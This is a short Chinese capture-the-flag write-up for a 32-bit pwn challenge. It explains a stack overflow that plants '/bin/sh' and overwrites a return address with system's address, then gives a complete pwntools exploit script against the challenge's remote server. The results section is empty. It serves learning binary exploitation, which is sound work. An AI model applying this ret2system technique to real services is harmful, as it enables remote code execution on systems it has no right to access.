地址
https://cgctf.nuptsast.com/challenges#Pwn
先观察一下,是一个32位的程序,而且只开了NX保护
用IDA看看伪代码,重点在message和pwnme这两个函数,一个存在溢出,一个可以调用system函数
我们先看看第一个fgets函数,A的大小是40个字符,明显存在了栈溢出,当A超过40个字符可以覆盖掉n的值,让n覆盖成‘/bin/sh‘,刚好弥补了程序中没有直接调用的shell
思路明确,让A溢出,把n的值覆盖成‘/bin/sh’,然后第二次输出的时候,再次溢出,返回地址覆盖成system的入口地址,再让system的参数变成’/bin/sh‘(n的地址)
payload2的p32(0xaaaa)是函数的返回地址,随便填
构造exp如下
from pwn import *
r=remote('182.254.217.142',10001)
e=ELF('./cgpwna')
sys_addr=e.symbols["system"]
#sys_addr=0x80483f0
r.recvuntil("your choice:")
r.sendline("1")
r.recvuntil("you can leave some message here:")
payload1='a'*40+'/bin/sh'
r.sendline(payload1)
payload2='a'*0x34+p32(sys_addr)+p32(0xaaaa)+p32(0x804a0a8)
r.recvuntil("your name please:")
r.sendline(payload2)
r.interactive()
执行结果
